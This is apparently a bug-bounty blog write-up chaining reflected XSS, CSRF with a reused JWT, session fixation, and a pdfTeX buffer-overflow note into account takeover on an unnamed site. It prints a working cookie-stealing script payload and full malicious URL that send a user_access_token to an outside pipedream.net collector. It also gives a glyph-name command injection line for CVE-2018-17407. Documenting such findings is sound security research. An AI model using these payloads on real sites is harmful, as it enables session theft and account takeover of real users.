From XSS To CSRF | One-click Authorized Access To Account Takeover
Hey Guys, I’ll show you today my last finding in a company maybe going to be a tech unicorn very soon! The name of the company is obscure based on a policy of the company itself.
Chain 4 Vulnerabilities To Reach Maximum Impact Possible
1st — [Reflected XSS] -
XSS enables attackers to inject client-side scripts into HTML context viewed by other users. So I tried to execute a simple payload in the search box.
and it worked!
Honestly, I didn’t expect that. So I decided to dig more with a high confident that I would find more vulnerabilities. The impact of this vulnerability is very dangerous on the user. because of the ability to steal user cookies and access them again to the website. I used ngrok to make tunnels to my localhost and pass document.cookie value using HTTP request through XMLHttpRequest (XHR)
let’s remove spaces and make the code condensed quite a bit.
When we check ngrok dashboard. we got the user cookies in the request. you can notice the most important one user_access_token, we will mention it later.
We can add this cookies to the browser and send it to the website and login as a vicitm.
2nd — [Cross-Site Request Forgery] -
I intercept changing password request, Looking carefully, I noticed that JSON web token that we get from previous XSS (user_access_token) is used without CSRF token, So I was able to change the password and take over the account. Moreover, the API returns user information contains sensitive info like email. So the attacker can use it to login without any hassle.
Replace the JWT in Authorization header with the user_access_token leads to change the password on behalf of the user.
I tried to chain XSS with CSRF to takeover the account and increase the impact of the vulnerabilities with a scenario I called it “Link2Hack” which needs a vicitm to click on the link to hijack the session cookies and change the password and retrieve the email’s vicitim in the response instantly.
let’s jump to the practical part.
1) Maintain your workflow
when you click on new workflow. you’ll get your workflow endpoint eg:-
add a new action to your workflow by clicking on the + button between any two steps.
I will choose the fastest way and select “Send HTTP Request”. it has one required parameter: the URL where you want to send the HTTP request. I’d like to change the HTTP method, add an HTTP payload, query string parameters or headers, I can click the add individual property. I change the method to ‘PATCH’ then set the headers which’s very important to make correct request.
Accept: application/vnd.api+json , Origin: https://redacted.net, Content-Type: application/vnd.api+json Authorization: Bearer
Now, We’re going to work on Authorization header and concatenate user_access_token value to ‘Bearer’ word since the application used JWT. I’ll pass this value through ‘c’ parameter through
steps objects, for example:
I can access properties of the HTTP request using
steps.trigger.event.body : A string or object representation of the HTTP payload
steps.trigger.event.client_ip : IP address of the client that made the request
steps.trigger.event.headers : HTTP headers, represented as an object
steps.trigger.event.method : HTTP method
steps.trigger.event.url : Request host + path
steps.trigger.event.query : URL Parameters
Accessing to ‘c’ parameter would be like that
Final step: add body of the request in payload parameter, which contains the password.
2) Get specific cookie value
since we got other values ( LiToken — ci_sessions — user_access_token) We need only user_access_token to make the request. for cutting this off from cookies I’ll use regex. replace() method searches a string for a specified value, or a regular expression, and returns a new string where the specified values are replaced.
So the final payload gonna be like this:
<script>var Cooki=document.cookie.replace(/(?:(?:^|.*;\s*)user_access_token\s*\=\s*([^;]*).*$)|^.*$/, "$1");x=new XMLHttpRequest();x.open('GET','https://entxk3uihmjvh5f.m.pipedream.net/?c='+Cooki,false);x.send();</script>
Well-done everything sets right. The full url:
https://redacted.com/?q=<script>var Cooki=document.cookie.replace(/(?:(?:^|.*;\s*)user_access_token\s*\=\s*([^;]*).*$)|^.*$/, "$1");x=new XMLHttpRequest();x.open('GET','https://entxk3uihmjvh5f.m.pipedream.net/?c='+Cooki,false);x.send();</script>
3rd — [Session Fixation] -
Session Fixation is about authenticating a user, or otherwise establishing a new user session, without invalidating any existing session identifier (SessionID) gives an attacker the opportunity to steal authenticated sessions or creates a new session on a web application and records the associated session identifier. Unfortunately, this’s what happened in this web app. After Changing the password the pervious SID still works. Which means the user continue using his account after the password has changed.
4th — Possible Buffer Overflow]-
The Company allows you to generate CV from your profile which will be created in PDF format. I generate a CV and download it. then I tried to extract pdf metadata using exiftool.
This is pdfTeX, Version 3.14159265–2.6–1.40.15 (TeX Live 2015/dev/Debian) kpathsea version 6.2.1dev. from TeX Users Group website:
This version is affected by Buffer Overflow [CVE-2018–17407] which was discovered in TeX Live before 2018–09–21. Briefly, We can use it to redirect the name of the glyph from the font file to serve as an argument to
system().But what is the glyph? glyph is a graphical symbol which is used to represent a readabe character for the purposes of writing. using
pdffonts to know fonts in our pdf:
Its contents are loaded into memory from reading entries like these from the .pfb file:
So the exploit as follows:
dup 72 /COMMAND_HERE put for example
dup 72 /whoami put which execute the command with the permissions of the
pdflatex process. Since this vulnerability wasn't in the web application, I wouldn't able to produce it. For further information you can see this awesome blog by Nick Roessler who discovered this vulnerability.
Thank you for reaching this point. Your feedback is highly appreciated twitter: @Psych0x02